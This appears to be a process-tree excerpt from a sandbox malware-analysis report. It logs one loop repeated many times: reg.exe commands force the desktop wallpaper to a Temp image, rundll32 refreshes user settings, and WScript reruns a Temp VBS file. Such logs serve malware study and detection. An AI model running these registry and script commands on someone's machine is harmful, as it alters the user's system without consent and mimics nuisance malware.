C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5404
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5576
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5664
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5704
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5800
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5936
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5980
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5996
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6044
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5188
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5184
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5576
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5772
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5160
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5184
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5580
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5420
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5808
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5944
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:1456
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5244
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5980
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3296
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5964
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5976
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3296
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5984
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6176
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6188
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6216
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6232
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6248
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6268
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6280
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6308
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6336
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6352
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6364
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6376
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6436
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6460
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6472
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6508
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6516
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6556
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6588
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6620
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6648
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6696
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6768
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6820
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6844
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6856
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6868
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6992
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7012
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7024
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7036
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7124
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7144
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6188
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6240
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6248
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6296
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6360
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6364
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6384
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6436
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6480
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3404
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6520
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6592
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6600
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:1848
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6752
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6288
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6368
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6388
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1492
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4580
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6652
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3856
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4452
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6352
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6388
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:1556
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:668
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6652
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6756
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3752
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6376
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3568
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6464
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6460
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:668
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3416
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6292
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6292
-
-
